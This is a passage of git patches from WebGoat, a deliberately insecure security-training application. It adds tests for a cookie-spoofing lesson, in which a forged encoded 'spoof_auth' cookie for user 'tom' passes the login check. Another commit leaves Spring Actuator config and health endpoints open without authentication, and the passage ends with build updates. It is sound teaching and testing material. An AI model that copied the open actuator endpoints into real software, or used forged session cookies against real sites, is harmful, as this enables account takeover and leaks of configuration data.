+import org.junit.jupiter.api.DisplayName;
+import org.junit.jupiter.api.Test;
+import org.junit.jupiter.api.extension.ExtendWith;
+import org.junit.jupiter.params.ParameterizedTest;
+import org.junit.jupiter.params.provider.Arguments;
+import org.junit.jupiter.params.provider.MethodSource;
+import org.mockito.junit.jupiter.MockitoExtension;
+import org.owasp.webgoat.assignments.AssignmentEndpointTest;
+import org.springframework.http.MediaType;
+import org.springframework.test.web.servlet.MockMvc;
+import org.springframework.test.web.servlet.ResultActions;
+import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
+
+/***
+ *
+ * @author Angel Olle Blazquez
+ *
+ */
+
+@ExtendWith(MockitoExtension.class)
+class SpoofCookieAssignmentTest extends AssignmentEndpointTest {
+
+    private MockMvc mockMvc;
+    private static final String COOKIE_NAME = "spoof_auth";
+    private static final String LOGIN_CONTEXT_PATH = "/SpoofCookie/login";
+    private static final String ERASE_COOKIE_CONTEXT_PATH = "/SpoofCookie/cleanup";
+
+    @BeforeEach
+    void setup() {
+        SpoofCookieAssignment spoofCookieAssignment = new SpoofCookieAssignment();
+        init(spoofCookieAssignment);
+        mockMvc = standaloneSetup(spoofCookieAssignment).build();
+    }
+
+    @Test
+    @DisplayName("Lesson completed")
+    void success() throws Exception {
+        Cookie cookie = new Cookie(COOKIE_NAME, "NjI2MTcwNGI3YTQxNGE1OTU2NzQ2ZDZmNzQ=");
+
+        ResultActions result = mockMvc.perform(MockMvcRequestBuilders
+            .post(LOGIN_CONTEXT_PATH)
+            .cookie(cookie)
+            .param("username", "")
+            .param("password", ""));
+
+        result.andExpect(status().isOk());
+        result.andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(true)));
+
+    }
+
+    @Test
+    @DisplayName("Valid credentials login without authentication cookie")
+    void validLoginWithoutCookieTest() throws Exception {
+        String username = "webgoat";
+        String password = "webgoat";
+
+        ResultActions result = mockMvc.perform(MockMvcRequestBuilders
+            .post(LOGIN_CONTEXT_PATH)
+            .param("username", username)
+            .param("password", password));
+
+        result.andExpect(status().isOk());
+        result.andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(false)));
+        result.andExpect(content().contentType(MediaType.APPLICATION_JSON_VALUE));
+        result.andExpect(cookie().value(COOKIE_NAME, not(emptyString())));
+
+    }
+
+    @ParameterizedTest
+    @MethodSource("providedCookieValues")
+    @DisplayName("Tests different invalid/valid -but not solved- cookie flow scenarios: "
+            + "1.- Invalid encoded cookie sent. "
+            + "2.- Valid cookie login (not tom) sent. "
+            + "3.- Valid cookie with not known username sent ")
+    void cookieLoginNotSolvedFlow(String cookieValue) throws Exception {
+        Cookie cookie = new Cookie(COOKIE_NAME, cookieValue);
+        mockMvc.perform(MockMvcRequestBuilders
+            .post(LOGIN_CONTEXT_PATH)
+            .cookie(cookie)
+            .param("username", "")
+            .param("password", ""))
+            .andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(false)));
+    }
+
+    @Test
+    @DisplayName("UnsatisfiedServletRequestParameterException test for missing username")
+    void invalidLoginWithUnsatisfiedServletRequestParameterExceptionOnUsernameMissing() throws Exception {
+        mockMvc.perform(MockMvcRequestBuilders
+            .post(LOGIN_CONTEXT_PATH)
+            .param("password", "anypassword"))
+            .andExpect(status().is4xxClientError());
+    }
+
+    @Test
+    @DisplayName("UnsatisfiedServletRequestParameterException test for missing password")
+    void invalidLoginWithUnsatisfiedServletRequestParameterExceptionOnPasswordMissing() throws Exception {
+        mockMvc.perform(MockMvcRequestBuilders
+            .post(LOGIN_CONTEXT_PATH)
+            .param("username", "webgoat"))
+            .andExpect(status().is4xxClientError());
+    }
+
+    @Test
+    @DisplayName("Invalid blank credentials login")
+    void invalidLoginWithBlankCredentials() throws Exception {
+        ResultActions result = mockMvc.perform(MockMvcRequestBuilders
+            .post(LOGIN_CONTEXT_PATH)
+            .param("username", "")
+            .param("password", ""));
+
+        result.andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(false)));
+
+    }
+
+    @Test
+    @DisplayName("Invalid blank password login")
+    void invalidLoginWithBlankPassword() throws Exception {
+        ResultActions result = mockMvc.perform(MockMvcRequestBuilders
+            .post(LOGIN_CONTEXT_PATH)
+            .param("username", "webgoat")
+            .param("password", ""));
+
+        result.andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(false)));
+
+    }
+
+    @Test
+    @DisplayName("cheater test")
+    void cheat() throws Exception {
+        ResultActions result = mockMvc.perform(MockMvcRequestBuilders
+            .post(LOGIN_CONTEXT_PATH)
+            .param("username", "tom")
+            .param("password", "apasswordfortom"));
+
+        result.andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(false)));
+    }
+
+    @Test
+    @DisplayName("Invalid login with tom username")
+    void invalidTomLogin() throws Exception {
+        ResultActions result = mockMvc.perform(MockMvcRequestBuilders
+            .post(LOGIN_CONTEXT_PATH)
+            .param("username", "tom")
+            .param("password", ""));
+
+        result.andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(false)));
+    }
+
+    @Test
+    @DisplayName("Erase authentication cookie")
+    void eraseAuthenticationCookie() throws Exception {
+        mockMvc.perform(MockMvcRequestBuilders
+            .get(ERASE_COOKIE_CONTEXT_PATH))
+            .andExpect(status().isOk())
+            .andExpect(cookie().maxAge(COOKIE_NAME, 0))
+            .andExpect(cookie().value(COOKIE_NAME, ""));
+
+    }
+
+    private static Stream<Arguments> providedCookieValues() {
+        return Stream.of(
+            Arguments.of("NjI2MTcwNGI3YTQxNGE1OTUNzQ2ZDZmNzQ="),
+            Arguments.of("NjI2MTcwNGI3YTQxNGE1OTU2NzQ3NDYxNmY2NzYyNjU3Nw=="),
+            Arguments.of("NmQ0NjQ1Njc0NjY4NGY2Mjc0NjQ2YzY1Njc2ZTYx"));
+    }
+
+}
diff --git a/webgoat-lessons/spoof-cookie/src/test/java/org/owasp/webgoat/spoofcookie/encoders/EncDecTest.java b/webgoat-lessons/spoof-cookie/src/test/java/org/owasp/webgoat/spoofcookie/encoders/EncDecTest.java
new file mode 100644
index 000000000..9edc3481f
--- /dev/null
+++ b/webgoat-lessons/spoof-cookie/src/test/java/org/owasp/webgoat/spoofcookie/encoders/EncDecTest.java
@@ -0,0 +1,89 @@
+/*
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details, please see http://www.owasp.org/
+ *
+ * Copyright (c) 2002 - 2021 Bruce Mayhew
+ *
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
+ *
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
+ *
+ * Getting Source ==============
+ *
+ * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
+ */
+
+package org.owasp.webgoat.spoofcookie.encoders;
+
+import static org.hamcrest.CoreMatchers.is;
+import static org.hamcrest.MatcherAssert.assertThat;
+import static org.junit.jupiter.api.Assertions.assertNull;
+import static org.junit.jupiter.api.Assertions.assertTrue;
+
+import java.util.stream.Stream;
+
+import org.junit.jupiter.api.DisplayName;
+import org.junit.jupiter.api.Test;
+import org.junit.jupiter.params.ParameterizedTest;
+import org.junit.jupiter.params.provider.Arguments;
+import org.junit.jupiter.params.provider.MethodSource;
+
+/***
+ *
+ * @author Angel Olle Blazquez
+ *
+ */
+
+class EncDecTest {
+
+    @ParameterizedTest
+    @DisplayName("Encode test")
+    @MethodSource("providedForEncValues")
+    void testEncode(String decoded, String encoded) {
+        String result = EncDec.encode(decoded);
+
+        assertTrue(result.endsWith(encoded));
+    }
+
+    @ParameterizedTest
+    @DisplayName("Decode test")
+    @MethodSource("providedForDecValues")
+    void testDecode(String decoded, String encoded) {
+        String result = EncDec.decode(encoded);
+
+        assertThat(decoded, is(result));
+    }
+
+    @Test
+    @DisplayName("null encode test")
+    void testNullEncode() {
+        assertNull(EncDec.encode(null));
+    }
+
+    @Test
+    @DisplayName("null decode test")
+    void testNullDecode() {
+        assertNull(EncDec.decode(null));
+    }
+
+    private static Stream<Arguments> providedForEncValues() {
+        return Stream.of(
+            Arguments.of("webgoat", "YxNmY2NzYyNjU3Nw=="),
+            Arguments.of("admin", "2ZTY5NmQ2NDYx"),
+            Arguments.of("tom", "2ZDZmNzQ="));
+    }
+
+    private static Stream<Arguments> providedForDecValues() {
+        return Stream.of(
+            Arguments.of("webgoat", "NjI2MTcwNGI3YTQxNGE1OTU2NzQ3NDYxNmY2NzYyNjU3Nw=="),
+            Arguments.of("admin", "NjI2MTcwNGI3YTQxNGE1OTU2NzQ2ZTY5NmQ2NDYx"),
+            Arguments.of("tom", "NjI2MTcwNGI3YTQxNGE1OTU2NzQ2ZDZmNzQ="));
+    }
+}
diff --git a/webgoat-server/pom.xml b/webgoat-server/pom.xml
index dce260880..76026ec18 100644
--- a/webgoat-server/pom.xml
+++ b/webgoat-server/pom.xml
@@ -149,6 +149,11 @@
             <artifactId>secure-passwords</artifactId>
             <version>${project.version}</version>
         </dependency>
+        <dependency>
+            <groupId>org.owasp.webgoat.lesson</groupId>
+            <artifactId>spoof-cookie</artifactId>
+            <version>${project.version}</version>
+        </dependency>
         <dependency>
             <groupId>org.owasp.webgoat.lesson</groupId>
             <artifactId>webgoat-lesson-template</artifactId>

From 9af514f3ebfb73bbfdff9f4d354512cfb59482bc Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=C3=80ngel=20Oll=C3=A9=20Bl=C3=A1zquez?= <angel@olleb.com>
Date: Wed, 22 Sep 2021 14:58:23 +0200
Subject: [PATCH 004/227] WebWolf DataSource Discovery

---
 docker/start.sh                               |   2 -
 .../org/owasp/webgoat/WebSecurityConfig.java  |   2 +-
 .../resources/application-webgoat.properties  |   6 +-
 webwolf/pom.xml                               |   4 +
 .../main/java/org/owasp/webwolf/WebWolf.java  |  27 +----
 .../webwolf/db/ActuatorDsJsonParser.java      |  58 +++++++++
 .../webwolf/db/DataSourceProperties.java      |  52 ++++++++
 .../owasp/webwolf/db/DataSourceResolver.java  | 111 ++++++++++++++++++
 .../db/ResourceUnavailableException.java      |  22 ++++
 .../resources/application-webwolf.properties  |   4 +-
 10 files changed, 260 insertions(+), 28 deletions(-)
 create mode 100644 webwolf/src/main/java/org/owasp/webwolf/db/ActuatorDsJsonParser.java
 create mode 100644 webwolf/src/main/java/org/owasp/webwolf/db/DataSourceProperties.java
 create mode 100644 webwolf/src/main/java/org/owasp/webwolf/db/DataSourceResolver.java
 create mode 100644 webwolf/src/main/java/org/owasp/webwolf/db/ResourceUnavailableException.java

diff --git a/docker/start.sh b/docker/start.sh
index de84b044a..6f6b27ee7 100644
--- a/docker/start.sh
+++ b/docker/start.sh
@@ -16,8 +16,6 @@ java \
  --add-opens java.base/java.io=ALL-UNNAMED \
  -jar webgoat.jar --webgoat.build.version="$1" --server.address=0.0.0.0 > webgoat.log &
 
-sleep 30
-
 echo "Starting WebWolf..."
 java -Duser.home=/home/webgoat -Dfile.encoding=UTF-8 -jar webwolf.jar --webgoat.build.version=$1 --server.address=0.0.0.0 > webwolf.log &
 
diff --git a/webgoat-container/src/main/java/org/owasp/webgoat/WebSecurityConfig.java b/webgoat-container/src/main/java/org/owasp/webgoat/WebSecurityConfig.java
index e2c5be022..4766bc5aa 100644
--- a/webgoat-container/src/main/java/org/owasp/webgoat/WebSecurityConfig.java
+++ b/webgoat-container/src/main/java/org/owasp/webgoat/WebSecurityConfig.java
@@ -58,7 +58,7 @@ public class WebSecurityConfig extends WebSecurityConfigurerAdapter {
     protected void configure(HttpSecurity http) throws Exception {
         ExpressionUrlAuthorizationConfigurer<HttpSecurity>.ExpressionInterceptUrlRegistry security = http
                 .authorizeRequests()
-                .antMatchers("/css/**", "/images/**", "/js/**", "fonts/**", "/plugins/**", "/registration", "/register.mvc").permitAll()
+                .antMatchers("/css/**", "/images/**", "/js/**", "fonts/**", "/plugins/**", "/registration", "/register.mvc", "/actuator/**").permitAll()
                 .anyRequest().authenticated();
         security.and()
                 .formLogin()
diff --git a/webgoat-container/src/main/resources/application-webgoat.properties b/webgoat-container/src/main/resources/application-webgoat.properties
index e2918e640..3339d1ced 100644
--- a/webgoat-container/src/main/resources/application-webgoat.properties
+++ b/webgoat-container/src/main/resources/application-webgoat.properties
@@ -55,4 +55,8 @@ exclude.categories=${EXCLUDE_CATEGORIES:none,none}
 #exclude based on the enum of the Category
 
 exclude.lessons=${EXCLUDE_LESSONS:none,none}
-#exclude based on the class name of a lesson e.g.: LessonTemplate
\ No newline at end of file
+#exclude based on the class name of a lesson e.g.: LessonTemplate
+
+management.health.db.enabled=true
+management.endpoint.health.show-details=always
+management.endpoints.web.exposure.include=health,configprops
diff --git a/webwolf/pom.xml b/webwolf/pom.xml
index fcfe4f92f..71ca07a4f 100644
--- a/webwolf/pom.xml
+++ b/webwolf/pom.xml
@@ -67,6 +67,10 @@
             <groupId>org.springframework.boot</groupId>
             <artifactId>spring-boot-starter-actuator</artifactId>
         </dependency>
+        <dependency>
+            <groupId>org.springframework.retry</groupId>
+            <artifactId>spring-retry</artifactId>
+        </dependency>
         <dependency>
             <groupId>org.thymeleaf.extras</groupId>
             <artifactId>thymeleaf-extras-springsecurity5</artifactId>
diff --git a/webwolf/src/main/java/org/owasp/webwolf/WebWolf.java b/webwolf/src/main/java/org/owasp/webwolf/WebWolf.java
index d798d2ef0..1b045d45c 100644
--- a/webwolf/src/main/java/org/owasp/webwolf/WebWolf.java
+++ b/webwolf/src/main/java/org/owasp/webwolf/WebWolf.java
@@ -22,18 +22,14 @@
 
 package org.owasp.webwolf;
 
+import java.io.IOException;
+import java.net.Socket;
+
 import org.owasp.webwolf.requests.WebWolfTraceRepository;
-import org.springframework.beans.factory.annotation.Value;
 import org.springframework.boot.SpringApplication;
 import org.springframework.boot.actuate.trace.http.HttpTraceRepository;
 import org.springframework.boot.autoconfigure.SpringBootApplication;
 import org.springframework.context.annotation.Bean;
-import org.springframework.jdbc.datasource.DriverManagerDataSource;
-
-import java.io.IOException;
-import java.net.Socket;
-
-import javax.sql.DataSource;
 
 @SpringBootApplication
 public class WebWolf {
@@ -45,26 +41,20 @@ public class WebWolf {
 
     public static void main(String[] args) {
         System.setProperty("spring.config.name", "application-webwolf");
-        
+
         String webwolfPort  = System.getenv("WEBWOLF_PORT");
-        String databasePort = System.getenv("WEBGOAT_HSQLPORT"); 
         String webGoatHost = null==System.getenv("WEBGOAT_HOST")?"127.0.0.1":System.getenv("WEBGOAT_HOST");
         String webWolfHost = null==System.getenv("WEBWOLF_HOST")?"127.0.0.1":System.getenv("WEBWOLF_HOST");
         String fileEncoding = System.getProperty("file.encoding");
 
         int wolfPort = webwolfPort == null?9090:Integer.parseInt(webwolfPort);
-        int dbPort = databasePort == null?9001:Integer.parseInt(databasePort);
         
         if (null==fileEncoding || !fileEncoding.equals("UTF-8")) {
         	System.out.println("It seems the application is startd on a OS with non default UTF-8 encoding:"+fileEncoding);
         	System.out.println("Please add: -Dfile.encoding=UTF-8");
         	System.exit(-1);
         }
-        
-        if (!isAlreadyRunning(webGoatHost, dbPort)) {
-        	System.out.println("It seems that the required database is not running. Please start WebGoat with the integrated or standalone database first.");
-        	System.exit(-1);
-        }
+
         if (isAlreadyRunning(webGoatHost, wolfPort)) {
         	System.out.println("Port "+webWolfHost+":"+wolfPort+" is in use. Use environment value WEBWOLF_PORT to set a different value.");
         	System.exit(-1);
@@ -72,13 +62,6 @@ public class WebWolf {
         SpringApplication.run(WebWolf.class, args);
     }
 
-    @Bean
-    public DataSource dataSource(@Value("${spring.datasource.url}") String url, @Value("${spring.datasource.driver-class-name}") String driverClassName) {
-        DriverManagerDataSource driverManagerDataSource = new DriverManagerDataSource(url);
-        driverManagerDataSource.setDriverClassName(driverClassName);
-        return driverManagerDataSource;
-    }
-    
     private static boolean isAlreadyRunning(String host, int port) {
         try (var ignored = new Socket(host, port)) {
             return true;
diff --git a/webwolf/src/main/java/org/owasp/webwolf/db/ActuatorDsJsonParser.java b/webwolf/src/main/java/org/owasp/webwolf/db/ActuatorDsJsonParser.java
new file mode 100644
index 000000000..56353d344
--- /dev/null
+++ b/webwolf/src/main/java/org/owasp/webwolf/db/ActuatorDsJsonParser.java
@@ -0,0 +1,58 @@
+/*
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details, please see http://www.owasp.org/
+ *
+ * Copyright (c) 2002 - 2021 Bruce Mayhew
+ *
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
+ *
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
+ *
+ * Getting Source ==============
+ *
+ * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
+ */
+
+package org.owasp.webwolf.db;
+
+import com.fasterxml.jackson.databind.JsonNode;
+
+import lombok.AccessLevel;
+import lombok.NoArgsConstructor;
+
+/**
+ * 
+ * @author Angel Olle Blazquez
+ *
+ */
+
+@NoArgsConstructor(access = AccessLevel.PRIVATE)
+public final class ActuatorDsJsonParser {
+
+    protected static final String getDsPropertyFromConfigProps(JsonNode node, String propertyName) {
+        return node
+            .get("application")
+            .get("beans")
+            .get("spring.datasource-org.springframework.boot.autoconfigure.jdbc.DataSourceProperties")
+            .get("properties")
+            .get(propertyName)
+            .asText();
+    }
+
+    protected static final String getDsHealthStatus(JsonNode node) {
+        return node
+            .get("components")
+            .get("db")
+            .get("components")
+            .get("dataSource")
+            .get("status")
+            .asText();
+    }
+}
diff --git a/webwolf/src/main/java/org/owasp/webwolf/db/DataSourceProperties.java b/webwolf/src/main/java/org/owasp/webwolf/db/DataSourceProperties.java
new file mode 100644
index 000000000..7f493fd7d
--- /dev/null
+++ b/webwolf/src/main/java/org/owasp/webwolf/db/DataSourceProperties.java
@@ -0,0 +1,52 @@
+/*
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details, please see http://www.owasp.org/
+ *
+ * Copyright (c) 2002 - 2021 Bruce Mayhew
+ *
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
+ *
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
+ *
+ * Getting Source ==============
+ *
+ * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
+ */
+
+package org.owasp.webwolf.db;
+
+import static org.owasp.webwolf.db.ActuatorDsJsonParser.getDsPropertyFromConfigProps;
+
+import java.io.Serializable;
+
+import com.fasterxml.jackson.annotation.JsonProperty;
+import com.fasterxml.jackson.databind.JsonNode;
+
+import lombok.Data;
+
+/**
+ * 
+ * @author Angel Olle Blazquez
+ *
+ */
+
+@Data
+public class DataSourceProperties implements Serializable {
+    private static final long serialVersionUID = -5897408528235134090L;
+    private String url;
+    private String driverClassName;
+
+    @JsonProperty("contexts")
+    protected void props(JsonNode node) {
+        url = getDsPropertyFromConfigProps(node, "url");
+        driverClassName = getDsPropertyFromConfigProps(node, "driverClassName");
+    }
+
+}
diff --git a/webwolf/src/main/java/org/owasp/webwolf/db/DataSourceResolver.java b/webwolf/src/main/java/org/owasp/webwolf/db/DataSourceResolver.java
new file mode 100644
index 000000000..407b66ed5
--- /dev/null
+++ b/webwolf/src/main/java/org/owasp/webwolf/db/DataSourceResolver.java
@@ -0,0 +1,111 @@
+/*
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details, please see http://www.owasp.org/
+ *
+ * Copyright (c) 2002 - 2021 Bruce Mayhew
+ *
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
+ *
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
+ *
+ * Getting Source ==============
+ *
+ * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
+ */
+
+package org.owasp.webwolf.db;
+
+import static org.owasp.webwolf.db.ActuatorDsJsonParser.getDsHealthStatus;
+
+import javax.sql.DataSource;
+
+import org.springframework.beans.factory.annotation.Autowired;
+import org.springframework.beans.factory.annotation.Value;
+import org.springframework.boot.SpringApplication;
+import org.springframework.boot.web.client.RestTemplateBuilder;
+import org.springframework.context.ApplicationContext;
+import org.springframework.context.annotation.Bean;
+import org.springframework.context.annotation.DependsOn;
+import org.springframework.jdbc.datasource.DriverManagerDataSource;
+import org.springframework.retry.annotation.Backoff;
+import org.springframework.retry.annotation.EnableRetry;
+import org.springframework.retry.annotation.Recover;
+import org.springframework.retry.annotation.Retryable;
+import org.springframework.stereotype.Component;
+import org.springframework.web.client.RestTemplate;
+
+import com.fasterxml.jackson.databind.JsonNode;
+
+import lombok.extern.slf4j.Slf4j;
+
+/**
+ * 
+ * @author Angel Olle Blazquez
+ *
+ */
+
+@Slf4j
+@Component
+@EnableRetry
+public class DataSourceResolver {
+
+    @Value("${webgoat.actuator.base.url}")
+    private String baseUrl;
+
+    @Value("${webgoat.actuator.health.db.path:/health}")
+    private String dbHealthPath;
+
+    @Value("${webgoat.actuator.configprops.path:/configprops}")
+    private String configPropsPath;
+    
+    @Autowired
+    ApplicationContext ctx;
+
+    @Bean
+    @DependsOn("dsConfigDiscovery")
+    public DataSource dataSource(DataSourceProperties dataSourceProperties) {
+        DriverManagerDataSource driverManagerDataSource = new DriverManagerDataSource(dataSourceProperties.getUrl());
+        driverManagerDataSource.setDriverClassName(dataSourceProperties.getDriverClassName());
+        return driverManagerDataSource;
+    }
+
+    @Bean
+    public RestTemplate restTemplate(RestTemplateBuilder builder) {
+        return builder.build();
+    }
+
+    @Bean
+    @Retryable(maxAttemptsExpression = "${webwolf.datasource-discovery.retry.max-attempts:5}",
+        value = Exception.class,
+        backoff = @Backoff(
+            multiplierExpression = "${webwolf.datasource-discovery.retry.backoff.multiplier:1.5}",
+            maxDelayExpression = "${webwolf.datasource-discovery.retry.backoff.max-delay:30000}",
+            delayExpression = "${webwolf.datasource-discovery.retry.backoff.delay:5000}"))
+    public DataSourceProperties dsConfigDiscovery(RestTemplate restTemplate) {
+        healthCheck(restTemplate);
+        return restTemplate.getForObject(baseUrl + configPropsPath, DataSourceProperties.class);
+    }
+
+    public void healthCheck(RestTemplate restTemplate) {
+        log.info("Checking database availability.");
+        JsonNode json = restTemplate.getForObject(baseUrl + dbHealthPath, JsonNode.class);
+        String status = getDsHealthStatus(json);
+        if (!status.equals("UP")) {
+            throw new ResourceUnavailableException();
+        }
+    }
+
+    @Recover
+    public DataSourceProperties exitOnResourceUnavailable(Exception e, RestTemplate restTemplate) {
+        log.error("It seems that the required database is not running. Please start WebGoat with the integrated or standalone database first.");
+        System.exit(SpringApplication.exit(ctx, () -> 1));
+        return null;
+    }
+}
diff --git a/webwolf/src/main/java/org/owasp/webwolf/db/ResourceUnavailableException.java b/webwolf/src/main/java/org/owasp/webwolf/db/ResourceUnavailableException.java
new file mode 100644
index 000000000..50f62c913
--- /dev/null
+++ b/webwolf/src/main/java/org/owasp/webwolf/db/ResourceUnavailableException.java
@@ -0,0 +1,22 @@
+package org.owasp.webwolf.db;
+
+public class ResourceUnavailableException extends RuntimeException {
+
+    private static final long serialVersionUID = 1L;
+    
+    public ResourceUnavailableException() {
+        super();
+    }
+
+    public ResourceUnavailableException(Throwable cause) {
+        super(cause);
+    }
+
+    public ResourceUnavailableException(String message) {
+        super(message);
+    }
+
+    public ResourceUnavailableException(String message, Throwable cause) {
+        super(message, cause);
+    }
+}
diff --git a/webwolf/src/main/resources/application-webwolf.properties b/webwolf/src/main/resources/application-webwolf.properties
index 755be1dc8..2c5c464a7 100644
--- a/webwolf/src/main/resources/application-webwolf.properties
+++ b/webwolf/src/main/resources/application-webwolf.properties
@@ -7,8 +7,6 @@ server.address=${WEBWOLF_HOST:127.0.0.1}
 server.servlet.session.cookie.name=WEBWOLFSESSION
 server.servlet.session.timeout=6000
 
-spring.datasource.url=jdbc:hsqldb:hsql://${WEBGOAT_HOST:127.0.0.1}:${WEBGOAT_HSQLPORT:9001}/webgoat
-spring.datasource.driver-class-name=org.hsqldb.jdbc.JDBCDriver
 spring.jpa.properties.hibernate.default_schema=CONTAINER
 spring.jpa.properties.hibernate.dialect=org.hibernate.dialect.HSQLDialect
 spring.jpa.hibernate.ddl-auto=update
@@ -32,9 +30,11 @@ multipart.max-file-size=1Mb
 multipart.max-request-size=1Mb
 
 webgoat.build.version=@project.version@
+webgoat.actuator.base.url=http://${WEBGOAT_HOST:127.0.0.1}:${WEBGOAT_PORT:8080}/WebGoat/actuator
 webgoat.server.directory=${user.home}/.webgoat-${webgoat.build.version}/
 webwolf.fileserver.location=${java.io.tmpdir}/webwolf-fileserver
 
+
 spring.jackson.serialization.indent_output=true
 spring.jackson.serialization.write-dates-as-timestamps=false
 

From 04d1293a33c04fa0a9812879952bccd7305a0ca5 Mon Sep 17 00:00:00 2001
From: Nanne Baars <nanne.baars@owasp.org>
Date: Thu, 23 Sep 2021 14:04:53 +0200
Subject: [PATCH 005/227] #1045: Run build with Java 16

---
 docker/Dockerfile                             |  2 +-
 docker/start.sh                               |  2 +
 pom.xml                                       | 21 +++----
 webgoat-container/pom.xml                     | 10 +--
 webgoat-integration-tests/pom.xml             | 46 +++++++-------
 ...rsalTest.java => PathTraversalITTest.java} | 24 ++++---
 .../resources/application-inttest.properties  |  6 +-
 webgoat-lessons/cross-site-scripting/pom.xml  | 24 -------
 .../deserialization/DeserializeTest.java      | 62 +++++++++----------
 .../path_traversal/ProfileZipSlip.java        | 17 +++--
 .../en/PathTraversal_zip_slip_solution.adoc   |  2 +-
 webgoat-lessons/vulnerable-components/pom.xml | 16 +++++
 webgoat-lessons/xxe/pom.xml                   | 11 ++--
 .../webgoat/xxe/ContentTypeAssignment.java    | 27 ++++----
 .../java/org/owasp/webgoat/xxe/SimpleXXE.java |  4 +-
 15 files changed, 126 insertions(+), 148 deletions(-)
 rename webgoat-integration-tests/src/test/java/org/owasp/webgoat/{PathTraversalTest.java => PathTraversalITTest.java} (87%)

diff --git a/docker/Dockerfile b/docker/Dockerfile
index 3047632a2..1437def53 100644
--- a/docker/Dockerfile
+++ b/docker/Dockerfile
@@ -1,4 +1,4 @@
-FROM openjdk:15-slim
+FROM openjdk:16-slim
 
 ARG webgoat_version=8.2.1-SNAPSHOT
 ENV webgoat_version_env=${webgoat_version}
diff --git a/docker/start.sh b/docker/start.sh
index 6f6b27ee7..c167d419b 100644
--- a/docker/start.sh
+++ b/docker/start.sh
@@ -8,9 +8,11 @@ echo "Starting WebGoat..."
 java \
  -Duser.home=/home/webgoat \
  -Dfile.encoding=UTF-8 \
+ --add-opens java.base/java.lang=ALL-UNNAMED \
  --add-opens java.base/java.util=ALL-UNNAMED \
  --add-opens java.base/java.lang.reflect=ALL-UNNAMED \
  --add-opens java.base/java.text=ALL-UNNAMED \
+ --add-opens java.desktop/java.beans=ALL-UNNAMED \
  --add-opens java.desktop/java.awt.font=ALL-UNNAMED \
  --add-opens java.base/sun.nio.ch=ALL-UNNAMED \
  --add-opens java.base/java.io=ALL-UNNAMED \
diff --git a/pom.xml b/pom.xml
index 893e45538..4a337bdda 100644
--- a/pom.xml
+++ b/pom.xml
@@ -8,6 +8,12 @@
     <packaging>pom</packaging>
     <version>8.2.1-SNAPSHOT</version>
 
+    <parent>
+        <groupId>org.springframework.boot</groupId>
+        <artifactId>spring-boot-starter-parent</artifactId>
+        <version>2.5.4</version>
+    </parent>
+
     <name>WebGoat Parent Pom</name>
     <description>Parent Pom for the WebGoat Project. A deliberately insecure Web Application</description>
     <inceptionYear>2006</inceptionYear>
@@ -22,12 +28,6 @@
         <url>https://github.com/WebGoat/WebGoat/</url>
     </organization>
 
-    <parent>
-        <groupId>org.springframework.boot</groupId>
-        <artifactId>spring-boot-starter-parent</artifactId>
-        <version>2.4.3</version>
-    </parent>
-
     <licenses>
         <license>
             <name>GNU General Public License, version 2</name>
@@ -122,22 +122,21 @@
         <maven.compiler.source>15</maven.compiler.source>
         <maven.compiler.target>15</maven.compiler.target>
 
-        <!-- This build number will be ubdated by Travis-CI -->
-        <build.number>build</build.number>
-
         <!-- Shared properties with plugins and version numbers across submodules-->
         <activation.version>1.1.1</activation.version>
+        <asciidoctorj.version>2.5.2</asciidoctorj.version>
         <commons-collections.version>3.2.1</commons-collections.version>
-        <commons-lang3.version>3.4</commons-lang3.version>
+        <commons-lang3.version>3.12.0</commons-lang3.version>
         <commons-io.version>2.6</commons-io.version>
         <guava.version>30.1-jre</guava.version>
